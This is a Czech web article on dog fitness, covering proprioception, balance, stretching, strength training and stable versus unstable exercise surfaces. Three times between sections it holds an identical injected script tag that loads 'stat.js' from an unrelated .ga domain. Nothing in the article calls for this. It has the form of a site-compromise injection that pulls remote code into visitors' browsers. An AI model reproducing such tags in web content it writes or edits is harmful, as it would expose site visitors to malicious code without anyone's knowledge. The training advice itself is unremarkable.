Dogfitness, nebo také canine fitness, se u nás poslední dobou rychle dostává do povědomí. Jedná se o soustavné cvičení vedoucí k posílení psího těla, vyrovnání svalových dysbalancí, kompenzaci jednostranných pohybů, zlepšení propriocepce, flexibility a rovnováhy. Sportovci věnují spoustu času fyzické přípravě mimo trénink svého sportu, u psa by tomu nemělo být jinak.

U psů, kteří aktivně trénují a závodí v nějakém sportu, by měl být věnovaný čas dostatečné fyzické přípravě. Pes by měl mít dobrou základní vytrvalost, na které je možné dále stavět specifické tréninky, tomuto tématu se více věnuje článek kondici psa. Důležitý je trénink i dalších dovedností.

Propriocepce, koordinace a rovnováha

Trénink propriocepce, koordinace a rovnováhy pomáhá psovi uvědomit si všechny svoje končetiny a naučit se s nimi vědomě pracovat. Při skocích nebo prudkých zatáčkách musí pes pracovat končetinami v dokonalé souhře a musí umět efektivně přenášet svoji váhu.

Pro trénink se využívají různé cviky, během kterých pes aktivně přenáší váhu, nebo je váha přesunována člověkem, který psovi zvedá končetiny, nebo navádí jeho hlavu do různých směrů. Využívají se také kavalety v různém postavení.

Obtížnost můžeme zvýšit cvičením na různých nestabilních a balančních pomůckách, z počátku stačí i velký polštář nebo matrace, které už jsou změnou oproti klasické pevné podlaze. Vždy je nutné zvážit aktuální zdravotní stav a kondici psa, cvičení mu přizpůsobit a obtížnost zvyšovat postupně.

Tyto dovednosti se psi učí i samovolně při volném pohybu v přírodě v nejrůznějších terénech. Využít můžeme různé přírodní překážky jako jsou velké kameny nebo ležící kmeny, které může pes přelézat a přecházet.

<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>

Flexibilita

Pravidelné protahování je velmi důležité pro zachování pružného těla. Po každém treninku dochází vlivem námahy k postupnému zkracování svalů. Jejich protahováním tomu můžeme zabránit a postupně jim vrátit jejich původní pružnost.

U pružných svalů je při podklouznutí nebo pádu menší riziko natáhnutí nebo natrhnutí. Pes, který je ztuhlý a zkrácený, nebude dosahovat takových výsledků jako dobře ohebný pes, protože se kolem bočnice překážky nebo tyček slalomu nedokáže tak těsně stočit. Kvůli zkráceným svalům může mít pes menší rozsah pohybu kloubů.

<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>

Síla

Při cíleném posilování se opakuje konkrétní specifický pohyb za účelem zvětšení síly svalu, počet opakování a míra zátěže se volí podle aktuální kondice psa. Konkrétní svalovou skupinu můžeme posilovat různými cviky a každý cvik posiluje více svalových skupin, proto je možné cviky různě zaměňovat tak, aby psovi vyhovovaly. I pár minut posilování několikrát týdně může poměrně rychle přinést viditelné výsledky.

Posilování můžeme rozdělit na trénink výbušnosti, trénink fázických svalů a trénink stabilizačních svalů.

Fázické svaly tvoří běžně viditelné výrazné svalstvo. Tyto svaly jsou zodpovědné za pohyb těla a čím jsou silnější, tím rychleji může pes běžet a lépe skákat. Fázické svaly jsou posilovány každodenní fyzickou aktivitou, ať už procházkami, běháním nebo plaváním.

<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>

Stabilizační svaly jsou okem neviditelné, ale velmi důležité - tvoří korzet psího těla, stabilizují klouby a udržují jednotlivé kosti na správném místě. Tyto svaly se intenzivně zapojují v případě podklouznutí nebo ztráty rovnováhy a pokud nejsou dostatečně silné, může dojít k jejich poranění. Stabilizační svaly jsou běžným pohybem posilovány jen velmi málo, proto je dobré se na jejich posílení zaměřit.

Stabilní nebo nestabilní povrch?

Na stabilním povrchu, ať už na zemi nebo pevném vyvýšeném targetu, je vhodné začínat, dokud si pes požadovanou pozici nebo pohyb správně neosvojí. Prováděním cviků na stabilním povrchu dochází k posilování zejména fázických svalů a pes se tak může stávat rychlejším a silnějším.

Po správně zvládnutém provedení požadované pozice nebo cviku je možné přejít na nestabilní povrch - polštář, matraci, balanční pomůcky. Při cvičení na nestabilním povrchu jsou posilovány zejména stabilizační svaly, které se musí intenzivně zapojovat, aby pes dokázal udržet rovnováhu.

Volbou povrchu, na kterém budeme se psem cvičit, tedy můžeme posilování přizpůsobit ve prospěch fázických nebo stabilizačních svalů. Ideální je povrchy střídat, aby docházelo ke zpevnění stabilizačních svalů, ale zároveň aby pes mohl být rychlejším a lepším skokanem.